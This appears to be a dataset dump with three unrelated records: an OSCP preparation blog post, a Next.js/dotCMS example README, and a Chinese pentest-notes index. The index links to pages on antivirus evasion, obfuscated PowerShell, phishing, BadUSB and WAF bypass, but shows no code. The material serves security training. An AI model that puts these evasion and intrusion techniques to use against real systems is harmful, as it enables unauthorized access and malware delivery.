text
stringlengths 9
334k
|
---|
# OSCP Journey - A Step Forward
![Alt text](https://github.com/gh0x0st/OSCP_Journey/blob/master/Screenshots/offsec-student-certified-emblem-rgb-oscp.png?raw=true "OSCP Logo")
This August, I've successfully completed the Penetration Testing with Kali (PWK) course and passed the Offensive Security Certified Professional (OSCP) exam.
I wanted to take some time and give back to the OffSec community and share some helpful tips in the hopes it helps pave the way into someone else's success story.
### Path to Success
1. Prerequisites
* Do I understand how to use Kali Linux?
* Can I perform an actual pen test?
* Which Linux operating system do I use?
* What host system should I use?
* How will I stay organized?
2. Course Material
3. Lab Network
* Security
* Strategy
4. Exam Strategy
* Report Template
* Screenshots
* Script Output
* Automated Enumeration
### 1. Prerequisites:
I would like to talk about things for you to do, or think about, before you sign up for the PWK course. Very frequently you'll see people ask how to prepare for the OSCP. I could argue that PWK prepares you enough, but you must understand your own limitations.
**Do I understand how to use Kali Linux?**
I mean specifically how to use the operating system, not executing the tools. If you're not comfortable with the basics of Linux, then you may find that you'll struggle a bit. There is a course and a free PDF called Kali Linux Revealed (https://www.kali.org/download-kali-linux-revealed-book/), created by the Offensive Security Team that will take care of this for you.
This book is like killing two birds with one stone. It's a book on how to basically use Linux, within Kali. What better way to help learn general Linux concepts within the OS the course is built around? With it being free, you can't go wrong with this.
**Can I perform an actual pen test?**
You need to understand your own limitations. This is a hard pill for people to swallow, especially publicly on the internet. Truthfully it comes with the territory in our field. If you are completely new to pen testing, do you feel you can you comfortably follow the courseware and pen test in their labs? What about if you take away the courseware, can you continue your own?
Then go ahead and jump in. If you want a precursor to the PWK Course, then dive right into Hack the Box (HTB) or look at EC Council's ECSA. I know EC Council is a touchy subject, but this all falls back on knowing your skillset. With ECSA, the exam itself, when I took it, was a written exam and 5 machine practical test that you had to provide a report for. Its difficulty was nowhere near the OSCP, but it's a good introduction into whether you can follow an ordered methodology without getting hints online.
ECSA - https://www.eccouncil.org/programs/certified-security-analyst-ecsa/
I find that CTFs are actually a great way to practice for the OSCP. They force you to enumerate meticulously and thoroughly, which is where most people tend to freeze. Look at this list from NetSecFocus, for the ones that retired, it's worth spending the money on to practice.
![Alt text](https://www.netsecfocus.com/assets/img/posts/TJNulls_Preparation_Guide_for_PWK/hackthebox.png "HTB Table")
**Which Linux operating system do I use?**
When it comes down to it, the entire course, and as the name implies, is built around Kali Linux. However, they provide you a student VM, along with other tools, on a specific build of Kali. If you don't want to use Kali and want to use Parrot or something else, then that is up to you. You're not going to have any advantage, or disadvantage by using any other OS, except maybe with some of the exercises.
Kali Student VM - https://support.offensive-security.com/pwk-kali-vm/
**What host system should I use?**
This is just my personal preference, but I used a hardened version of Windows 10 as my host OS and had VMWare Workstation Pro to serve up my Kali VM. You must run screen recording software on your host machine and web cam software on either the same machine or a different machine. Regardless of the host OS you're using, be prepared that if you run into a technical issue with either of the technical proctoring components that you cannot resolve in a timely manner, they will fail you.
**How will I stay organized?**
**_Backups:_**
You need some sort of backup solution for your notes. The last position you want to be is in your exam and suddenly, your VM crashes and you can't get any files from it. I really enjoy OneDrive, I have it set on my Windows 10 Machine, and shared the directory with my Kali VM. This way I dump all scan results, scripts, etc, to the shared directory and they instantly sync to my windows machine and the cloud.
On the night before my exam, I setup two different virtual machines. One I called Kali-Exam and one called Kali-Exam-Backup. Both machines were setup and configured and ready to go at any time. There were times during my lab time where my virtual machine just died. I didn't run any updates or change anything fancy, it just wouldn't boot or take accept snapshots. Be prepared for this.
**_Notes:_**
I have no objections to using CherryTree, Dradis, etc, but I've always used OneNote and stuck to what I was comfortable with. Most importantly, make sure your solution is backed up somehow. You don't have to get overly fancy or verbose with how you take notes. Just keep it easy enough so if you wanted to revisit a machine, you understand the steps you took to get you to wherever you left off. I like to treat machine notes and scan results as two different things. With machine notes, I kept them as brief narratives about where I left off or how I accomplished a foothold. If I needed the more technical details, I would add them in my formal write up while referencing what I needed in my scan results.
![Alt text](https://github.com/gh0x0st/OSCP_Journey/blob/master/Screenshots/OneNote_Snippet.png?raw=true "OneNote Snippet")
**_Terminal:_**
TMUX is a life saver, enough said. This is a solution that will help your terminal stay organized very easily. I've never used another solution other than Tmux, but it works for me. I use it in a few different ways. One way is to keep each step of the exploitation process on its own tab. If I need to reference anything, I can just go to the next tab. Granted we should always output our scans to our backup directory '*awkward glare*', but sometimes when you're in the zone you just want to look at a terminal.
![Alt text](https://github.com/gh0x0st/OSCP_Journey/blob/master/Screenshots/TMUX_Snippet.png?raw=true "Tmux Snippet")
The other reason why I use a terminal organizer is when I’m trying to catch shells. I like being able to split a shell so I can attempt my command and see if I catch it all in one view without going back and forth.
![Alt text](https://github.com/gh0x0st/OSCP_Journey/blob/master/Screenshots/TMUX_REV_SHELL.png?raw=true "Tmux Snippet 2")
### 2. Course Material:
The courseware and the videos go hand in hand. What I would recommend you to do is read a section and then watch the corresponding video. The great thing about the courseware is that you'll be finding and attacking machines in the lab depending on the chapter. It will not go through every machine, but it will teach you how to find low hanging fruit.
Keep in mind that if you want those 5 extra points, you'll need to document your course exercises. Most of them you can answer with a screenshot so if you document the exercises in OneNote it'll be easy to port them over to lab report.
### 3. Lab Network:
The lab network was probably the most fun I had in the entire course. This is where all your prep work and studying comes out to shine. If I could stress anything about the lab it would be down to two talking points, security and strategy.
**_Security_**
You are connected to a lab network with hackers; some are ethical, some likely not. Offensive Security puts in a lot of work to vet their applicants before they are even accepted into the course. Once they're in, they put in controls to help lower the likelihood of students being able to attack each other, but you should still be cautious. Whilst you can attack the lab targets, students on those targets could leverage this. Just always be cognizant of what you're doing.
* Make your root password complex and only turn on SSH when you need it
* Restrict your listeners to only the expected hosts. This is straight from an exercise and is a good overall idea. The example here drops all traffic to port 4444 unless it's from ip 10.10.10.10.
iptables -A INPUT -p tcp --destination-port 4444 ! -d 10.10.10.10 -j DROP
* Kill your listeners until you’re ready to use them
* If you drop a payload on a target, then go away for a few hours and the machine hasn't been reverted, either review what you dropped or just generate it again before you decide to execute it
in Kali Linux Revealed, grab the free PDF and look at chapter 7, Securing and Monitoring Kali Linux. You will read some great resources on securing Kali.
**_Strategy:_**
This is where it gets fun, and truthfully will determine how much you're willing to discipline yourself in the PWK Labs. Here are some simple guidelines to work by:
1. Only use EternalBlue and DirtyCow once and after the fact exploit them the intended way. You can own quite a few machines using EB. But in the end do you really think you'll be able to use it in the exam? There's absolute merit in using it in the field because most organizations have a poor patching strategy, but the OffSec admins are not clueless. Do not rely on these; if you get stuck on a machine, just move to a different target and come back.
2. Do not use automated enumeration tools...yet
There are only two times to use automated scripts: To save time and to reverse engineer. When you are in the labs, you really need to learn how to enumerate the machines manually. Sounds simple? It really is, but people tend to be a little lazy at this step. Here's a rough methodology that I follow with every machine:
1. Find open TCP/UDP ports
2. Identify the services on those ports
3. For each service you find, identify their version and write them down. For example:
- 22/tcp ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
- 80/tcp http Apache httpd 2.4.7 ((Ubuntu))
4. For each service you have identified, one service at a time, use the Nmap NSE scripts against them. You should really get into the habit of exhausting Nmap and its scripting engine before you touch any other tool.
5. Use targeted enumeration tools, such as Nikto for web or enum4linux for SMB
6. Now if you have a web server, spend about 20 minutes going over some general checks for file inclusions, injections or other possible attack vectors. This isn't the OSWE course, if there's a web attack vector in OSCP, it's not going to be that difficult to find.
At this point, you should have a decent attack plan. If you train yourself to pause before looking for exploits, you'll learn to enumerate thoroughly. This is important. That last thing you want to do is try to launch an exploit at the first service you find, only find that it doesn't work and getting yourself stuck in a rabbit hole.
### 4. Exam Strategy:
All the work you've done has led up to this point. You've completed the coursework and have spent some good time in the labs. Now there's a few things you should do before and during your exam:
**_Report Template_**
The templates provided by Offensive Security are great and are more than enough, but don't be intimidated to forge them a bit into what works for you. After your exam, you're going to have 24 hours to submit your report. You're likely going to be very mentally drained; you should really rest at this point. Save yourself some time and make your report template ahead of time. This is the general template I used for every machine:
![Alt text](https://github.com/gh0x0st/OSCP_Journey/blob/master/Screenshots/Report_Snippet.png?raw=true "OneNote Snippet")
**_Screenshots_**
A good strategy with your screenshots is trying to get a screen grab with each major step of the exploitation process, but when you save the screenshot, save them in numerical order, such as 1_nmap, 2_nikto, 3_dirscan, 4_exploit, 5_lowshell, etc. This way when you are done a machine, you can scroll through all the screenshots to ensure you have a screen grab of every major step you have taken, and it'll be easier for you to see if you have missed anything.
**_Script Output_**
Learn how to output all your tools to a file and save them to your shared drive directory that we talked about above. This way you can always fall back and review results in the event you close a terminal, reboot, etc.
**_Automated Enumeration_**
You need to manage your time wisely. This is where it's safe for you to use scripted enumeration. While you're working on one machine, you should be scanning the others. I liked the python script called AutoRecon by Tib3rius. It was efficient and provided all the details you need in easily identifiable txt files. There's a lot of these tools out there, of which I'll reference below. But before your exam, try them all out and see which ones help you the most. Just pick one machine in the lab and let them run.
1. AutoRecon - https://github.com/Tib3rius/AutoRecon
2. Reconnoitre - https://github.com/codingo/Reconnoitre
3. nmapAutomator - https://github.com/21y4d/nmapAutomator
With all of this is said and done, just relax. If you fail the first time, don't give up. Get back in the labs and practice more.
Try Harder.
|
# A statically generated blog example using Next.js and dotCMS
This example showcases Next.js's [Static Generation](https://nextjs.org/docs/basic-features/pages) feature using [dotCMS](https://dotcms.com/) as the data source.
## Demo
### [https://nextjs-dotcms-blog.vercel.app/](https://nextjs-dotcms-blog.vercel.app/)
## Deploy your own
Using the Deploy Button below, you'll deploy the Next.js project.
[![Deploy with Vercel](https://vercel.com/button)](https://vercel.com/new/clone?repository-url=https%3A%2F%2Fgithub.com%2FdotCMS%2Fnext.js%2Ftree%2Fcanary%2Fexamples%2Fcms-dotcms&project-name=nextjs-dotcms-blog&repository-name=nextjs-dotcms-blog&demo-title=Next.js+Blog&demo-description=Static+blog+with+multiple+authors+using+Preview+Mode&demo-url=https%3A%2F%2Fnext-blog-dotcms.vercel.app%2F)
### Related examples
- [AgilityCMS](/examples/cms-agilitycms)
- [Builder.io](/examples/cms-builder-io)
- [ButterCMS](/examples/cms-buttercms)
- [Contentful](/examples/cms-contentful)
- [Cosmic](/examples/cms-cosmic)
- [DatoCMS](/examples/cms-datocms)
- [DotCMS](/examples/cms-dotcms)
- [Drupal](/examples/cms-drupal)
- [Enterspeed](/examples/cms-enterspeed)
- [Ghost](/examples/cms-ghost)
- [GraphCMS](/examples/cms-graphcms)
- [Kontent](/examples/cms-kontent-ai)
- [Prepr](/examples/cms-prepr)
- [Prismic](/examples/cms-prismic)
- [Sanity](/examples/cms-sanity)
- [Sitefinity](/examples/cms-sitefinity)
- [Storyblok](/examples/cms-storyblok)
- [TakeShape](/examples/cms-takeshape)
- [Umbraco heartcore](/examples/cms-umbraco-heartcore)
- [Webiny](/examples/cms-webiny)
- [Blog Starter](/examples/blog-starter)
- [WordPress](/examples/cms-wordpress)
## How to use
Rename `.env.local.example` to `.env.local` and complete the variables:
`NEXT_PUBLIC_DOTCMS_HOST` is the dotCMS host, you can use `https://demo.dotcms.com`
`DOTCMS_TOKEN` for the demo site, you can generate the token using:
```
curl -H "Content-Type:application/json" --insecure -X POST -d '
{ "user":"[email protected]", "password":"admin", "expirationDays": 10 }
' http://demo.dotcms.com:8080/api/v1/authentication/api-token
```
Execute [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app) with [npm](https://docs.npmjs.com/cli/init), [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/), or [pnpm](https://pnpm.io) to bootstrap the example:
```bash
npx create-next-app --example cms-dotcms cms-dotcms-app
# or
yarn create next-app --example cms-dotcms cms-dotcms-app
# or
pnpm create next-app --example cms-dotcms cms-dotcms-app
```
[![Deploy with Vercel](https://vercel.com/button)](https://vercel.com/new/clone?repository-url=https%3A%2F%2Fgithub.com%2Fvercel%2Fnext.js%2Ftree%2Fcanary%2Fexamples%2Fcms-dotcms&project-name=nextjs-dotcms-blog&repository-name=nextjs-dotcms-blog&demo-title=Next.js+Blog&demo-description=Static+blog+with+multiple+authors+using+Preview+Mode&demo-url=https%3A%2F%2Fnext-blog-dotcms.vercel.app%2F)
|
* 公众号:关注安全技术
* Author:小y
* wiki:https://www.heresecurity.wiki/
![image](https://github.com/xiaoy-sec/Pentest_Note/blob/master/img/wechat.png)
# Pentest_Note
查找内容请配合wiki食用或使用CTRL+F搜索
## 主目录
- [个人卫生](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/个人卫生.md)
- [收集信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/README.md)
- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/README.md)
- [防御规避](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/README.md)
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/README.md)
- [文件操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/README.md)
- [内网和域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/README.md)
- [HASH操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/README.md)
- [横向移动](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/横向移动/README.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/README.md)
- [赏金技巧](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/赏金技巧/README.md)
- [云安全](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/README.md)
- [Redteam红队](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/Redteam红队/README.md)
***
## 详细目录
- [个人卫生](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/个人卫生.md)
- [收集信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/README.md)
- [域名信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/域名信息/README.md)
- [CDN是否存在](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/域名信息/CDN是否存在.md)
- [Bypass CDN](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/域名信息/绕过CDN.md)
- [DNS历史记录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/域名信息/DNS历史记录.md)
- [SSL证书信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/域名信息/SSL证书信息.md)
- [Whois信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/域名信息/Whois信息.md)
- [子域名检查](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/子域名检查.md)
- [IP和端口信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/IP和端口信息/README.md)
- [ASN](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/IP和端口信息/ASN.md)
- [历史IP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/IP和端口信息/历史IP.md)
- [NMAP使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/IP和端口信息/NMAP使用.md)
- [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/IP和端口信息/工具.md)
- [网站架构和指纹识别](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/网站架构和指纹识别.md)
- [其他信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/其他信息.md)
- [人员信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/收集信息/人员信息.md)
- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/README.md)
- [Web服务突破](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/README.md)
- [前端](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/前端.md)
- [SQL注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/README.md)
- [判断注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/判断注入.md)
- [数据库类型识别](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/数据库类型识别.md)
- [MSSQL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/MSSQL.md)
- [MYSQL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/MYSQL.md)
- [Oracle](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/Oracle.md)
- [PostgreSQL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/PostgreSQL.md)
- [SQLite](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/SQLite.md)
- [DB2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/DB2.md)
- [SQLMAP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SQL注入/SQLMAP.md)
- [XSS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/XSS.md)
- [CSRF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/CSRF.md)
- [PHP包含下载读取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/PHP包含下载读取.md)
- [XML](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/XML.md)
- [SSRF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SSRF.md)
- [DNSLOG](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/DNSLOG.md)
- [Xpath注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/Xpath注入.md)
- [SSTI](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/SSTI.md)
- [命令注入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/命令注入.md)
- [PHPMyAdmin利用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/PHPMyAdmin利用.md)
- [PHP-FPM之RCE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/PHP-FPM之RCE.md)
- [PHPstudy后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/PHPstudy后门.md)
- [IIS写权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/IIS写权限.md)
- [绕过WAF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/绕过WAF.md)
- [数据库](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/数据库.md)
- [命令执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/命令执行.md)
- [CmdHijack](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/CmdHijack.md)
- [Fuzz目录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/Fuzz目录.md)
- [web程序漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/web程序漏洞.md)
- [编辑器漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/编辑器漏洞.md)
- [邮件地址payload](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/邮件地址payload.md)
- [从LFI到RCE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/从LFI到RCE.md)
- [深x服](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/深x服.md)
- [天r信](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/tianr.md)
- [Web server日志分析命令](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/Web-server日志分析命令.md)
- [默认密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/默认密码.md)
- [wso2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/Web服务突破/wso2.md)
- [未授权访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/README.md)
- [Redis](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/Redis.md)
- [activemq](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/activemq.md)
- [docker](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/docker.md)
- [elastic](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/elastic.md)
- [hadoop](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/hadoop.md)
- [jboss](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/jboss.md)
- [jenkins](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/jenkins.md)
- [memcache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/memcache.md)
- [mongo](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/mongo.md)
- [zookeeper](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/zookeeper.md)
- [CouchDB](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/CouchDB.md)
- [Jenkins](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/Jenkins.md)
- [Solr](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/Solr.md)
- [VNC](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/VNC.md)
- [Weblogic](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/Weblogic.md)
- [Zabbix](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/未授权访问/Zabbix.md)
- [一些Bypass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/README.md)
- [Linux绕过disable_function](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/Linux绕过disable_function.md)
- [Windows系统组件com绕过](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/Windows系统组件com绕过.md)
- [cgi启动方式](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/cgi启动方式.md)
- [蚁剑绕过](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/蚁剑绕过.md)
- [ImageMagick组件绕过](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/ImageMagick组件绕过.md)
- [常规函数绕过](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/常规函数绕过.md)
- [Open_basedir绕过](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/Open_basedir绕过.md)
- [绕过lsa protection](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/绕过lsa-protection.md)
- [Bypass mod_security](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/一些Bypass/Bypass-mod_security.md)
- [TomcatAjp之LFI&RCE](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/TomcatAjp之LFI&RCE.md)
- [MSSQL&Agent之Job上线](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/MSSQL&Agent之Job上线.md)
- [MySQL开启外联](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/MySQL开启外联.md)
- [MySQL连接读取文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/MySQL连接读取文件.md)
- [MySQL不登陆执行命令](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/MySQL不登陆执行命令.md)
- [近源攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/README.md)
- [WI-FI破解](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/WI-FI破解.md)
- [钓鱼网络](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/钓鱼网络.md)
- [无线干扰](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/无线干扰.md)
- [BadUSB](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/BadUSB.md)
- [蓝牙](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/蓝牙.md)
- [克隆卡](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/近源攻击/克隆卡.md)
- [鱼叉式攻击](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/鱼叉式攻击/README.md)
- [钓鱼邮件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/鱼叉式攻击/钓鱼邮件.md)
- [钓鱼连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/鱼叉式攻击/钓鱼连接.md)
- [第三方鱼叉](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/初始访问/鱼叉式攻击/第三方鱼叉.md)
- [防御规避](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/README.md)
- [C#源码免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/C#源码免杀/README.md)
- [直接编译](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/C#源码免杀/直接编译.md)
- [CSC+InstallUtil](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/C#源码免杀/CSC+InstallUtil.md)
- [加密处理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/C#源码免杀/加密处理.md)
- [XOR和AES编码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/C#源码免杀/XOR和AES编码.md)
- [Python源码免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Python源码免杀/README.md)
- [pyinstaller加载C代码编译](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Python源码免杀/pyinstaller加载C代码编译.md)
- [加载器分离](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Python源码免杀/加载器分离.md)
- [Base64编码+Pyinstaller打包](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Python源码免杀/Base64编码+Pyinstaller打包.md)
- [pyinstaller加载py代码编译](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Python源码免杀/pyinstaller加载py代码编译.md)
- [Powershell免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/README.md)
- [行为检测](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/行为检测.md)
- [分块免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/分块免杀.md)
- [拆分+C编译](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/拆分+C编译.md)
- [CobaltStrike+Powershell免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/CobaltStrike+Powershell免杀.md)
- [Out-EncryptedScript](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/Out-EncryptedScript.md)
- [Invoke-Shellcode](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/Invoke-Shellcode.md)
- [Invoke-Obfuscation](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/obfuscation.md)
- [直接生成](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/直接生成.md)
- [PyFuscation](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/PyFuscation.md)
- [Xencrypt](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Powershell免杀/Xencrypt.md)
- [the-backdoor-factory](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/the-backdoor-factory.md)
- [捆绑器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/捆绑器.md)
- [DLL劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/DLL劫持.md)
- [Evasion模块](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Evasion模块.md)
- [Golang](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Golang.md)
- [GreatSCT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/GreatSCT.md)
- [hanzoInjection](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/hanzoInjection.md)
- [InstallUtil](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/InstallUtil.md)
